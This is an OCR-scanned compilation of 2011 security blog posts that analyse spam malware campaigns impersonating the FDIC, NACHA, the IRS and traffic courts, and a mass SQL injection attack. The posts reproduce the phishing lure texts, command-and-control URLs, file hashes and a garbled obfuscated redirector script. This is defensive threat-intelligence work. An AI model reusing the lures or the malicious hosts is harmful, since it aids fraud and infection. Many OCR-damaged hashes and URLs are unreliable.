scam, entiong .tutors mto cfcckrvo on a bogus vtdeo Ink. 

MS Patch Tuesday wanting: Opening 
legitimate .doc, .txt files brings code execution 
risk 

Mcrosoft s Patch Tuesday tram drops oft fwe butetms wth fries for 13 
docunented vukwraM&es aftectmg Windows and Ibcroseft Office. 

Ghost in the Wires: The Kevin Mitnick Interview 

The world s most famous hacker discusses Ns new book. Ns evptats. 

Ns enpnsonment and Ns success. Meet trie Ghost n the wees. Kevm 



Summarizing ZDNet's Zero Day Posts for August 
(2011-09-27 19:13) 

The follcwing is a brief summary pf all pf my ppsts at ZDNet's 
Zere Day fer August. Yeu can subscribe tp my 

[l]personal RSS feed, [2]Zero Day's main feed, pr 

fpllpw me pn Twitter: 









01. [3]Study: Rootkits target pirated copies of Windows XP 

02. [4]56 percent of enterprise users using vulnerable Adobe 
Reader plugins 

03. [5]New malware attack circulating on Facebook 

04. [6]Kaspersky: 12 different vulnerabilities detected on 
every PC 

05. [7]Spamvertised Uniform traffic tickets and invoices lead 
to malware 

06. [8]Latest version of Skype susceptible to malicious code 
injection flaw 

07. [9]Spamvertised 'Scan from a Xerox WorkCentre Pro' 
leads to malware 

08. [10]Malware Watch: FDIC and Western Union themed 
emails lead to malware 

This post has been reproduced from [HJDancho 
Danchev's blog. Follow him [12Jon Twitter. 

1. http://www.zdnet-com/tooics/dancho+danchev? 
o=i&mode=rss&ta q = mantle skin : content 
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208 

3. http://www.zdnet.com/blo a /securitv/studv-rootkits-tar a et- 
pirated-copies-of-windows-xp/9223 

4. http://www.zdnet.com/blo a /securitv/56-percent-of- 
enterprise-users-usin a -vulnerable-adobe-reader-plu a ins/9 
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5. http://www.zdnet.com/blo a /securitv/new-malware-attack- 
circulatin a -on-facebook/9281 

6. http://www.zdnet.com/blo a /securitv/kasoerskv-12- 
different-vulnerabilities-detected-on-ever v- pc/9283 

7. http://www.zdnet.com/blo a /securit v/s oamvertised-uniform- 
traffic-tickets-and-invoices-lead-to-mal ware/9289 

8. http://www.zdnet.com/blo a /securitv/latest-version-of- 
skv oe-susceptible-to-malicious-code-in i ection-flaw/9 

295 


9. http://www.zdnet.com/blo a /securit v/s oamvertised-scan- 
from-a-xerox-workcentre-oro-leads-to-mal ware/9315 

10. http://www.zdnet.com/blo a /securitv/malware-watch-fdic- 
and-western-union-themed-emails-lead-to-mal ware/932 

8 

11. http://ddanchev.blo as oot.com/ 

12. http://twitter.com/danchodanchev 
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' Uniform iramc ticket From: 'automailer -095‘ <autom3ller ■095@n ) t3O'/> 

= Subject: Uniform tram c t> cfcet 

From: 'automaiier -095' <aulomaiier-095@n>CQW> 

To: 

Date: 2011-08-17 05:03:29 


New York State — Department of Motor Vehicles 

UNIFORM TRAFFIC TICKET 


POLICE AGENCY 


NEW YORK STATE POLICE 


Local Police Code 


THE PERSON DESCRIBED ABO\T IS CHARGED AS FOLLOWS 

Time Date of Offense IN VIOLATION OF 

7:25 AM 07 05 2011 MS V AND T LAW 

Description of Violation 

SPEED OVER 55 ZONE 

TO PLEAD, PRINT OUT THE ENCLOSED TICKET AND SEND IT TO TOWN COURT, 
CHATAM HALL.. PO BOX 117 


Spamvertised 'Uniform Traffic Ticket' and 'FDIC 
Notifications' Serving Malware - Historical OSINT 

(2011-09-28 14:43) 

The following intelligence brief will summarize the findings 
from a brief analysis performed on two malware 

campaigns from August, namely, the [l]spamvertised 
Uniform Traffic Tickets and the [2]FDIC Notification. 

Uniform Traffic Tickets 

Spamvertised attachments-Ticket-728-2011.zip; Ticket-064- 
211.zip; Ticket-728-2011.zip 


Detection rates: 






Ticket.exe - [3]Gen:Trojan.Heur.FU.bqW@aK9ebrii - 

Detection rate: 37/43 (86.0 %) 

MD5 : 6361d4a40485345cl8473f3c6b4b6609 

SHA1 : 50b09bb2e0044aal39a84c2e445a56f01d70cl85 

SHA256: 

Ca67al4bfed2a7bc2ac8be9c01cbl7d5dal2b75320b4bad4f 

e8d8a6759ad9725 

Ticketl.exe - [4]Trojan-Downloader.Win32.Small.ccxz - 

Detection rate: 36/44 (81.8 %) 

MD5 : e2a2d67b8a52ae655f92779bec296676 

SHA1 : ed3df72b4e073ffba7174ebc8cb77b2b7d012cbf 

SHA256: 

50bl04c5f8314327e03b01e7f7c2535d8de7cd9f73f8el6dl3 

64c7fd021a90cc 

Upon execution the samples phone back to: 

sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (responding to the 
same IP is also survey-providers.info) - AS51630 - Email: 210 

admin@sdkjgndfjnf.ru 

rattsillis.com/ftp/g.php - 195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 

rattsillis.com/pusk3.exe - 195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 



DNS emulation of nsl.lemanbrostm.info reveals two 
domains belidiskalom.com - 178.208.76.175 - Email: 
admin@belidiskalom.com and lemanbrostm.info - Email 
coz@yahoo.com using the same name server. 

Known MD5 modifications for pusk3.exe at 
rattsillis.com: 

C6dab856705b5dfd09b2adbel0701b05 

fl67213c6a79f2313995e80a8ac29939 

f4764cce5c3795bld63a299a5329d2e2 

dae9e7653573478a6b41a62f7cb99cl2 

69c983c9dfaf37e346004c9aaf54a3d0 

d875b8e32a231405c7fa96b810e9b361 

628270c6e44b0fa21ef8e87c6bc36f57 

9b69dabd876e967bcd2eb85465175e3b 

0434c084dba8626df980c7974d5728el 

Related binaries and associated MD5 modifications: 

rattsillis.com/blood.exe - MD5: 

23795cb9b2f5el9eff0df0cf2fba9247; 

82b6fl8bl30alf0celce928d0980fab0 

rattsillis.com/pusk.exe - MD5: 

55d8e25bc373a98c5c29284c989953ab; 

368c86556e827d898f043a4d5f378fa0; 



7411d0d29db91f2625ee36d438eb6ac4; 

3ea4e9fd297b3058ebbb360cl581aaac; 

rattsillis.com/pusk2.exe - MD5: 

dae9e7653573478a6b41a62f7cb99cl2; 

b73705c097c9be9779730d801ad098e0; 

d7952cle77d7bb250cdfa88el57fb5a8 

Known MD5 modifications for pusk3.exe at 
sdkjgndfjnf.ru: 8672f021e7705b6a8132b7dfc21617cf 

sdkjgndfjnf.ru/blood.exe - MD5: 

577cf0b7ca3d5bcbe35764024f241fa8; 

ebf7278a7239378e7d70d426779962ce 

sdkjgndfjnf.ru/pusk2.exe - MD5: 
d9e36e25a3181f574fd5d520cb501d3a 

sdkjgndfjnf.ru/pusk.exe - MD5: 
fce04f7681283207d585561ed91e77b4 

sdkjgndfjnf.ru/blood.exe - MD5: 
577cf0b7ca3d5bcbe35764024f241fa8 

Detection rate for blood.exe: 

blood.exe - [5]Trojan-Spy.Win32.Zbot - 25/44 (56.8 %) 

MD5 : 577cf0b7ca3d5bcbe35764024f241fa8 

SHA1 : 30f542a44d06d9125cdfbdd38d79de778e4c0791 

SHA256: 

1741ef5d24641ee99b5d78a68109162bebc714c3dl9abc37 

e3d4472f3dcd6fl8 
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4 FOIC notification From: "no reply* <no repl)@tdlc gov> 

3 Subject: FDIC notification 

From: "no reply" <no reply@fdic gov* 

Date: 2011-08-30 02:23 03 


Dear customer, 

Your account ACH and WIRE transaction have been temporarily suspended for 

security reasons due to the expiration of your security version. To download and 
install the newest installations read the document(pdf) attached below. 

As soon as it is setup, you transaction abilities will be fully restored. 


Best Regards. Online Security department, Federal Deposit Insurance Corporation. 


FDIC Notification 

Spamvertised attachments: FDIC _Document.zip 
Detection rate: 

FDIC _Document.exe - 

Gen:Trojan.Heur.FU.bqW@a45Fklbi - 35/44 (79.5 %) 

MD5 : 7b5a271c58c6bbl8d79cd48353127ff6 SHA1 : 
6526b6097df42f93bee25d7ea73f95d2fcc24d3a SHA256: 

a09165c71a8dd2al338b2bd0c92ae07495041ael5592e343 

2bd50600e6ef2af0 

Upon execution phones back to: 

rattsillis.com/ftp/g.php 

rattsillis.com/blood.exe 

rattsillis.com/blood.exe - MD5: 

23795cb9b2f5el9eff0df0cf2fba9247; 

82b6fl8bl30alf0celce928d0980fab0 






What's particularly interesting is the fact that both 
campaigns have been launched by the same cybercriminal, 

with the same C &C - rattsillis.com also seen in the 

[6]spamvertised ACH Payment Canceled campaign. 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. http://www.zdnet.com/blo a /securit v/s pamvertised-uniform- 
traffic-tickets-and-invoices-lead-to-mal ware/9289 

2. http://www.zdnet.com/blo a /securitv/malware-watch-fdic- 
and-western-union-themed-emails-lead-to-mal ware/932 

8 

3. 

http://www.virustotal.com/file-scan/report.html? 

il d=ca6 7a 14 bfed 2 a 7 bc2 acS be9c0 i cb 17 d 5 d a 12 b7 5 3 2 0 b4 ba 

d4fe8d8a 

6759ad9725-1315139717 

4. 

http://www.virustotal.com/file-scan/report.html? 

id = 50bl04c5f8314327eQ3b01e7f7c2535d8de7cd9f73f8el6 

d!364c7 

fdQ21a90cc-1315139775 

5. 

http://www.virustotal.com/file-scan/report.html? 

id=1741ef5d24641ee99b5d78a68109162bebc714c3dl9abc 

37e3d447 
























2f3dcd6fl8-1315161281 


6. http://labs.m86securitv.com/2011/Q9/an-analvsis-of-the- 
ach-spam-campai an/ 

7. http://ddanchev.blo as pot.com/ 

8. http://twitter.com/danchodanchev 
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• Uniform traffic ticket From: 'automaller-095' <automall«r -095(gn)CQOV» 

~ Subject: Uniform traffic ticket 

From: ‘automaller -095‘ <automaiier -095@nycocrr» 

To: 

Date: 2011-08-17 05:03:29 


New York State — Department of Motor Vehicles 

UNIFORM TRAFFIC TICKET 


POLICE AGENCY 


NEW YORK STATE POLICE 


Local Police Code 


THE PERSON DESCRIBED ABOVE IS CHARGED AS FOLLOWS 

Time Date of Offense IN VIOLATION OF 

7:25 AM 07 05 2011 NYS V AND T LAW 

Description of Violation 

SPEED OVER 55 ZONE 

TO PLEAD, PRINT OUT THE ENCLOSED TICKET AND SEND IT TO TOWN COURT, 
CHATAM HALL.. PO BOX 117 


Spamvertised 'Uniform Traffic Ticket' and 'FDIC 
Notifications' Serving Malware - Historical OSINT 

(2011-09-28 14:43) 

The following intelligence brief will summarize the findings 
from a brief analysis performed on two malware 















campaigns from August, namely, the [l]spamvertised 
Uniform Traffic Tickets and the [2]FDIC Notification. 

Uniform Traffic Tickets 

Spamvertised attachments-Ticket-728-2011.zip; Ticket-064- 
211.zip; Ticket-728-2011.zip 

Detection rates: 

Ticket.exe - [3]Gen:Trojan.Heur.FU.bqW@aK9ebrii - 

Detection rate: 37/43 (86.0 %) 

MD5 : 6361d4a40485345cl8473f3c6b4b6609 

SHA1 : 50b09bb2e0044aal39a84c2e445a56f01d70cl85 

SHA256: 

Ca67al4bfed2a7bc2ac8be9c01cbl7d5dal2b75320b4bad4f 

e8d8a6759ad9725 

Ticketl.exe - [4]Trojan-Downloader.Win32.Small.ccxz - 

Detection rate: 36/44 (81.8 %) 

MD5 : e2a2d67b8a52ae655f92779bec296676 

SHA1 : ed3df72b4e073ffba7174ebc8cb77b2b7d012cbf 

SHA256: 

50bl04c5f8314327e03b01e7f7c2535d8de7cd9f73f8el6dl3 

64c7fd021a90cc 

Upon execution the samples phone back to: 

sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (responding to the 
same IP is also survey-providers.info) - AS51630 - Email: 213 


admin@sdkjgndfjnf.ru 



rattsillis.com/ftp/g.php - 195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 

rattsillis.com/pusk3.exe - 195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 

DNS emulation of nsl.lemanbrostm.info reveals two 
domains belidiskalom.com - 178.208.76.175 - Email: 
admin@belidiskalom.com and lemanbrostm.info - Email 
coz@yahoo.com using the same name server. 

Known MD5 modifications for pusk3.exe at 
rattsillis.com: 

C6dab856705b5dfd09b2adbel0701b05 

fl67213c6a79f2313995e80a8ac29939 

f4764cce5c3795bld63a299a5329d2e2 

dae9e7653573478a6b41a62f7cb99cl2 

69c983c9dfaf37e346004c9aaf54a3d0 

d875b8e32a231405c7fa96b810e9b361 

628270c6e44b0fa21ef8e87c6bc36f57 

9b69dabd876e967bcd2eb85465175e3b 

0434c084dba8626df980c7974d5728el 

Related binaries and associated MD5 modifications: 

rattsillis.com/blood.exe - MD5: 
23795cb9b2f5el9eff0df0cf2fba9247; 



82b6fl8bl30alf0celce928d0980fab0 

rattsillis.com/pusk.exe - MD5: 

55d8e25bc373a98c5c29284c989953ab; 

368c86556e827d898f043a4d5f378fa0; 

7411d0d29db91f2625ee36d438eb6ac4; 

3ea4e9fd297b3058ebbb360cl581aaac; 

rattsillis.com/pusk2.exe - MD5: 

dae9e7653573478a6b41a62f7cb99cl2; 

b73705c097c9be9779730d801ad098e0; 

d7952cle77d7bb250cdfa88el57fb5a8 

Known MD5 modifications for pusk3.exe at 
sdkjgndfjnf.ru: 8672f021e7705b6a8132b7dfc21617cf 

sdkjgndfjnf.ru/blood.exe - MD5: 

577cf0b7ca3d5bcbe35764024f241fa8; 

ebf7278a7239378e7d70d426779962ce 

sdkjgndfjnf.ru/pusk2.exe - MD5: 
d9e36e25a3181f574fd5d520cb501d3a 

sdkjgndfjnf.ru/pusk.exe - MD5: 
fce04f7681283207d585561ed91e77b4 

sdkjgndfjnf.ru/blood.exe - MD5: 
577cf0b7ca3d5bcbe35764024f241fa8 

Detection rate for blood.exe: 

blood.exe - [5]Trojan-Spy.Win32.Zbot - 25/44 (56.8 %) 


MD5 : 577cf0b7ca3d5bcbe35764024f241fa8 



SHA1 : 30f542a44d06d9125cdfbdd38d79de778e4c0791 
SHA256: 

1741ef5d24641ee99b5d78a68109162bebc714c3dl9abc37 

e3d4472f3dcd6fl8 
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** FDIC notification From:'no reply" <no reply@1dlc gov> 

a Subiect FDIC notification 

From: *no reply' <no reply@fdic gov> 

Date: 2011-08-30 02 23 03 


Dear customer. 

Your account ACH and WIRE transaction have been temporarily suspended for 

security reasons due to the expiration of your security version. To download and 
install the newest installations read the document(pdf) attached below. 

As soon as it is setup, you transaction abilities will be fully restored. 


Best Regards, Online Security departament, Federal Deposit Insurance Corporation. 


FDIC Notification 

Spamvertised attachments: FDIC _Document.zip 
Detection rate: 

FDIC _Document.exe - 

Gen:Trojan.Heur.FU.bqW@a45Fklbi - 35/44 (79.5 %) 

MD5 : 7b5a271c58c6bbl8d79cd48353127ff6 SHA1 : 
6526b6097df42f93bee25d7ea73f95d2fcc24d3a SHA256: 

a09165c71a8dd2al338b2bd0c92ae07495041ael5592e343 

2bd50600e6ef2af0 

Upon execution phones back to: 

rattsillis.com/ftp/g.php 






rattsillis.com/blood.exe 

rattsillis.com/blood.exe - MD5: 

23795cb9b2f5el9eff0df0cf2fba9247; 

82b6fl8bl30alf0celce928d0980fab0 

What's particularly interesting is the fact that both 
campaigns have been launched by the same cybercriminal, 

with the same C &C - rattsillis.com also seen in the 

[6]spamvertised ACH Payment Canceled campaign. 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. http://www.zdnet.com/blo a /securit v/s pamvertised-uniform- 
traffic-tickets-and-invoices-lead-to-mal ware/9289 

2. http://www.zdnet.com/blo a /securitv/malware-watch-fdic- 
and-western-union-themed-emails-lead-to-mal ware/932 

8 

3. 

http://www.virustotal.com/file-scan/report.html? 

I cl=c a 6 7 a 14 fa f e d 2 a 7 lb c 2 a c 8 b e 9 e 01 c b 17 d 5 d a 12 b 7 5 3 2 0 b 4 b a 

d4fe8d8a 

6759ad9725-1315139717 

4. 

http://www.virustotal.com/file-scan/report.html? 

id = 50bl04c5f8314327e03b01e7f7c2535d8de7cd9f73f8el6 

d!364c7 


fd021a90cc-1315139775 




















5. 


http://www.vi rustotal.com/file-scan/report.html? 
id=1741ef5d24641ee99b5d78a68109162bebc714c3dl9abc 

37e3d447 

2f3dcd6fi8-1315161281 

6. http://labs.m86securitv.com/2011/Q9/an-analvsis-of-the- 
ach-spam-campai an/ 

7. http://ddanchev.blo as pot.com/ 

8. http://twitter.com/danchodanchev 
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Special Coverage 


— CAN you SOLVE THE PROBLEM 

SECURITY ISSUES AREN'T ALWAYS BLACK AND P— 



Zero Day 


ZDStt Must Read 

Adobe rushes out Flash Player patch to thwart zero-day attacks 

Ano«h*r mch«w*J attack prompts an urgent Flash (Haver patch Item Adobe. 


How to become a hacker 

Becemng a hacker n a worthwhde pursue. Do rou have wtuc «takes to 
become a hacker’ 

Hackers using QR codes to push Android 
malware 

Orxe a user scans the Q« code, the code redeem them to a s<« that 
*1 oital a Trojan on thee Androad smart phone s . 

Faulty Microsoft AV update nukes Chrome 
browser 

Mcrosoft has cordrmed that its searCy toots erroneously removed the 
Google Chrome browser hem VMndows machnes. marfang it as a yanar* 
of the notenous Zeus (Zbot) mafware famdy. 

Surve)’; 60 percent of users use the same 
password across more than one of their online 


SCairng on top oT the 
latest n 

soft* are/hardw are 
tscunty research, 
vukntrsNOtt, 
threats and computer 
attacks 



Summarizing ZDNet's Zero Day Posts for September 
(2011-10-04 14:37) 

The following is a brief summary of all of my posts at ZDNet's 
Zero Day for September. You can subscribe to my 

[l]personal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01. [3]Spamvertised 'Facebook notification' leads to exploits 
and malware 










02. [4]Google, Mozilla and Microsoft ban the DigiNotar 
Certificate Authority in their browsers 

03. [5]Microsoft themed ransomware variant spotted in the 
wild 

04. [6]'Man in wheelchair falls down the elevator shaft' scam 
spreading on Facebook 

05. [7]New ransomware variant uses false child porn 
accusations 

06. [8]Russian Embassy in London hit by a DDoS attack 

07. [9]uTorrent.com hacked, serving scareware 

08. [10]Bank of Melbourne Twitter account hacked, 
spreading phishing links 

09. [ll]Malicious spam campaigns proliferating 

10. [12]Spamvertised 'We are going to sue you' emails lead 
to malware 
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11. [13]XSS bug in Skype for iPhone, iPad allows address 
book theft 

12. [14]Researcher releases details on 6 SCADA 
vulnerabilities 

13. [15]DIY botnet kit spotted in the wild 

14. [16]New Mac OS X trojan poses as malicious PDF file 

15. [17]Survey: 60 percent of users use the same password 
across more than one of their online accounts 



This post has been reproduced from [18]Dancho 
Danchev's blog. Follow him [19]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev? 
p=l&mpde=rss&ta a = mantle_skin : content 

2. http://feeds.feedburner.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securit v/s pamvertised- 
facebook-notification-leads-to-exploits-and-mal ware/9334 

4. http://www.zdnet.com/blo a /securit v/a oo a le-mozilla-and- 
microsoft-ban-the-di a inotar-certificate-authorit v-i 

n-their-browsers/9337 

5. http://www.zdnet.com/blo a /securitv/microsoft-themed- 
ransomware-variant-sootted-in-the-wild/9341 

6. http://www.zdnet.com/blo a /securitv/man-in-wheelchair- 
falls-down-the-elevator-shaft-scam-soreadin a -on-face 

book/9403 

7. http://www.zdnet.com/blo a /securitv/new-ransomware- 
vanant-uses-false-child-oorn-accusations-/9406 

8. http://www.zdnet.com/blo a /securitv/russian-embassv-in- 
london-hit-bv-a-ddos-attack/9409 

9. http://www.zdnet.com/blo a /securitv/utorrentcom-hacked- 
servin a -scareware/9413 

10. http://www.zdnet.com/blo a /securitv/bank-of-melbourne- 
twitter-account-hacked-spreadin a- phishin a -l inks/9415 

11. http://www.zdnet.com/blo a /securitv/malicious-spam- 
camoai a ns-proliferatin a /9420 





























































12. http://www.zdnet.com/blo a /securit v/s pamvertised-we- 
are- g oin a -to-sue-vou-emails-lead-to-mal ware/942 3 

13. http://www.zdnet.com/blo a /securitv/xss-bu a Hin-sk v pe-for- 
i phone-ipad-allows-address-boQk-theft/9426 

14. http://www.zdnet.com/blo a /securitv/researcher-releases- 
details-on-6-scada-vulnerabilities/9432 

15. http://www.zdnet.com/blo a /securitv/div-botnet-kit- 
s ootted-in-the-wild/9440 

16. http://www.zdnet.com/blo a /securitv/new-mac-os-x-tro i an- 
ooses-as-maHicious-odf-file/9486 

17. http://www.zdnet.com/blo a /securitv/survev-6Q-oercent- 
of-users-use-the-same-oassword-across-more-than-one- 

of-their-on line-accounts/9489 

18. http://ddanchev.blo as oot.com/ 

19. http://twitter.com/danchodanchev 
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Dear Valued Client, 

We strongly believe that your account may have been compromised. Due to this, we cancelled the last ACH transactions: 

-(ID: 13104924) 

-(ID: 04804768) 

-(ID: 37527025) 

-(ID: 51633547) 

initiated from your bank account by you or any other person, who might have access to your account. 

Detailed report on initiated transactions and reasons for cancellation can be found in the attachment. 

Spamvertised "NACHA security nitification" Serving 
Malware - Historical OSINT (2011-10-04 14:38) 


The following intelligence brief will offer historical OSINT on 
the "NACHA security nitification" - the typo is intentionally 









































left as this is how the original campaign was spamvertised - 
malware campaign. 

Spamvertised body: 

Dear Valued Client, We strongly believe that your account 
may have been compromised. Due to this, we cancelled 

the last ACH transactions:-(ID: 13104924)-(ID: 04804768)- 
(ID: 37527025)-(ID: 51633547)initiated from your bank 

account by you or any other person, who might have access 
to your account.Detailed report on initiated transactions and 
reasons for cancellation can be found in the attachment. 


The ACH transaction (ID: 83612541), recently sent from your 
bank account (by you or any other person), was rejected by 
the Electronic Payments Association. 

########################## 

##################### 

Canceled transaction 

Transaction ID: 83612541 

Reason of rejection See details in the report below 

Transaction Report report_1409.pdf.zip (ZIP archive, Adobe 
PDF) 


########################## 

##################### 




13450 Sunrise Valley Drive, Suite 100 Herndon, VA 20171 
(703) 561-1100 

2011 NACHA - The Electronic Payments Association 

Spamvertised attachments: report_1409.pdf.zip; Report- 
8764.zip 

Detection rate: 

Report-8764.exe - [l]Gen:Trojan.Heur.FU.bqW@amtJU@oi - 
39/43 (90.7 %) 

MD5 : 7cl31fa05e01fc32d8f4efe53aa883dl 

SHA1 : 14d52d76dd7ccc595554486027634bf8c9877036 

SHA256: 

Iadllcll93f0dbcae3766e5cb4094accl37cl0430d615e554 

70cbc41ce6cd03a 

Upon execution the sample phones back to: 

onemoretimehi.ru/piety.exe - 188.65.208.59; 
178.208.91.192 - Email: admin@onemoretimehi.ru 

onemoretimehi.ru/ftp/g.php 

piety.exe - MD5: 4bd87ecc4423f0bcl5e229ecbf33aa2c 

onemoretimehi.ru/tops.exe - MD5: 

f076dbc365ec7bfc438ad3c728702122; 

86c7489ac539a0b57a4d075e723075f0 

This post has been reproduced from [2]Dancho 
Danchev's blog. Follow him [3Jon Twitter. 
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1 . 


http://www.vi rustotal.com/file-scan/report.html? 

id = ladllcll93f(3dbcae3766e5cb4Q94accl37cl043Qd615e 

55470cbc 

4Ice6cd03a-1317676852 

2. http://ddanchev.blo as oot.com/ 

3. http://twitter.com/danchodanchev 
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Tax notice. 

There are arrears reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, enclosed. 

Sincerely, 

Internal Revenue Service. 


Spamvertised "IRS notice" Serving Malware (2011-10- 
09 19:53) 

Cybercriminals are spamvertising yet another malware¬ 
serving campaign. Impersonating the IRS, malicious 
attackers 

are attempting to entice end users into downloading and 
executing a malicious file attachment. 

Spamvertised message: Tax notice, There are arrears 
reckoned on your account over a period of 2010-2011 

year. You will find all calculations according to your financial 
debt, enclosed. Sincerely, Internal Revenue Service 
Detection rate: 










Calculations.exe - [l]TrojanDownloader:Win32/Dofoil.D - 

33/43 (76.7 %) 

MD5 : 178bb562d9c0ef2b0a87467dcbd945ee 

SHA1 : 9ef75146aeb27102ale5662284f369a43144225c 

SHA256: 

dl551934d60033c871b377015c8be65d608b33543fl49369 

dle70361e06dc05e 

Upon execution, it phones back to 

falcononfly2006.ru/blog/task.php? 
bid=2bfc680038ba2be7 &os=5-l-2600 

&uptime=0 &rnd=150156 

falcononfly2006.ru - 91.229.90.139, AS6753 - Email: 
makrogerhouse@yandex.ru 

makrogerhouse@yandex.ru is also associated with the 
following domains: 

diamondexchange2011.ru 

philippinemoney2011.ru 

Bedownloader2011.ru 

dolcekomarenoro2011.ru 

forsalgal02.ru 

runescapegpge2011.ru 

yomwarayom2001.ru 

philippinemoney2011.ru 



moneymgmt2011.ru 

moneykeep2011.ru 

firewallmakeover.ru 

czechmoney2011.ru 

communityspace2911.ru 

brazilianmoney2011.ru 

Monitoring of the campaign is ongoing . 

This post has been reproduced from [2]Dancho 
Danchev's blog. Follow him [3Jon Twitter. 

1. 

http://www.vi rustotal.com/file-scan/report.html? 
id=dl551934d60033c871b377Q15c8be65d608b33543fl49 

369dle703 
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61e06dc05e-1318162358 

2. http://ddanchev.blo as pot.com/ 

3. http://twitter.com/danchodanchev 
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Notice, 


There are arrears reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, enclosed. 

You have to pay out the debt by the 17 December 2011. 


Yours sincerely, 

IRS. 

Spamvertised IRS-themed "Last Notice" Emails 
Serving Malware (2011-10-18 21:45) 

Cybercriminals are once again impersonating the Internal 
Revenue Service (IRS) for malware-serving purposes. In 

this intelligence brief, we'll dissect the malware campaign. 

Spamvertised attachment: IRS Calculations 
#ID6749.zip 

Spamvertised message: Notice, There are arrears 
reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, 
enclosed. You have to pay out the debt by the 17 December 
2011. Yours sincerely, IRS. 

- Detection rate: 

IRS _Calculations.exe - [l]W32/Yakes.B!tr - 34/40 (85.0 %) 

MD5 : e44eb03582f030d30251e6be384f6b32 

SHA1: eaa3d76534d247d04987b8950965d0142d770b29 

SHA256: 

18386f49580298eee73688ce5e626a9e332886c25403a991 

495e0a3250c53e32 

Upon execution phones back to: 



bitgale.com/404.php?type=stats &affid=574 
&subid=01 &iruns - 31.44.184.42; AS15884 - Email: 

davidsid- 

dins@gxmailbox.com 

shbsharri.com/arkivi _files/574-01.exe - returns 
"Bandwidth Limit Exceeded" - 74.55.50.202; AS21844 - 
Email: contact@privacyprotect.org 

shbsharri.com/arkivi files/setup.exe - returns 
"Bandwidth Limit Exceeded" 

shbsharri.com/arkivi _files/sll6.exe - returns "Bandwidth 
Limit Exceeded" 

shbsharri.com/arkivi files/sssss.exe - returns 
"Bandwidth Limit Exceeded" 

gansgansgroup.ru/true/index.php?cmd=getgrab - 

Connect to 91.229.90.139 on port 80 ... failed 

gansgansgroup.ru/true/index.php?cmd=getproxy - 

Connect to 91.229.90.139 on port 80 ... failed 

gansgansgroup.ru/true/index.php?cmd=getload 
&login=4117AF14E694E469C &sel=donat &ver=5.1 
&bits=0 

&file=l &run=ok 

gansgansgroup.ru/true/index.php7cmd~getsocks 
&login=4117AF14E694E469C &port=11925 

gansgansgroup.ru - 91.229.90.139; AS6753 (responding 
to 91.229.90.139 is also falcononfly2006.ru - Email: 



makrogerhouse@yandex.ru) - Email: 
gansgansgroup.ru@allperson.ru 

The same email makrogerhouse@yandex.ru, has been linked 

to a [2]previously spamvertised IRS-themed 

malware campaign. 

Clearly, both campaigns have been launched by the same 
cybercriminal. 

This post has been reproduced from [3]Dancho 
Danchev's blog. Follow him [4]on Twitter. 
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1 . 

http://www.virustotal.com/file-scan/report.html? 

id=18386f49580298eee73688ce5e626a9e332886c25403a9 

91495e0a 

3250c53e32-1318962605 

2. http://ddanchev.blo as pot.com/2011/lQ/spamvertised-irs- 
notice-servm a -malware.html 

3. http://ddanchev.blo as pot.com/ 
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Hrrp/i.i2oocx 

Date: Wed, 19 Oct 2011 11:24:05 GMT 

Server: Apache/2.2.19 f&ssSSP) OAV/2 BfR/S.3.6 mod sd/ 2.2.19 Qosafia/).9-8c| 

Ust-McdVd: Wed, 19 Oct 2011 11:20:03 GMT 
ETaa : •2blA86e-lda8-Aafa5O5771ec0‘ 

Accept-ftanges: bytes 
Content-cength: 7S92 
Coonecboo: dose 

Content-Type: aoptceaon Aayasapl 

var *£-['78742', *78742', '78835*, *78843', '7882r, *78848', *78843', *78764', *78793', *78764', *78771', '78836', *73848', '78848', *78844', '78790', *78779', '78779*, *7885 
ver temp-*; 
var Ofl-*; 

for (i-O; ccjfc'tenjth; i++){ 
flg^l-78732; 

tefT«"temo-fStrrv3. fr Qo^harCodefQQ) : 

> 

exifttemp); 


bookfula.com 


bookgusa.com 


bookvtlacom 


www.filedl.com 


bookzula com 


C U All E 


filedl com 



M£T 146 185.248 0/24 ** AS43134 


nbn|kl com 

nbnjkl.com 


Dissecting the Ongoing Mass SQL Injection Attack 
(2011-10-20 23:36) 

The [l]ongoing mass SQL injection attack, has already 
affected over a [2]million web sites. Cybercriminals 
performing [3]active search engines [4]reconnaissance 

have managed to inject a malicious script into ASP ASP.NET 
websites. 

From [5]client-side exploits to bogus Adobe Flash players, 
the campaign is active and ongoing. In this intelligence brief, 
we'll dissect the campaign and establish a direct connection 
between the campaign and last March's 

[6]Lizamoon mass SQL injection attack. 


SQL injected domains - thanks to Dasient's Tufan Demir 
for the ping: 

nbnjki.com/urchin.js - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 

jjghui.com/urchin.js - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 

bookzula.com/ur.php - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 

bookgusa.com/ur.php - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 

dfrgcc.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

statsl.com/ur.php - 111.22.111.111 - Email: 
jamesnorthone@hotmailbox.com 

milapop.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

jhgukn.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 
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vovmml.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

bookvivi.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

Responding to 146.185.248.3 is also file-dl.com; 

bookfula.com and bookvila.com - Email: 



james- 

northone@hotmailbox.com 
Detection rate for urchin.js: 

urchin.js - [7]Trojan.JS.Redirector - 17/42 (40.5 %) 

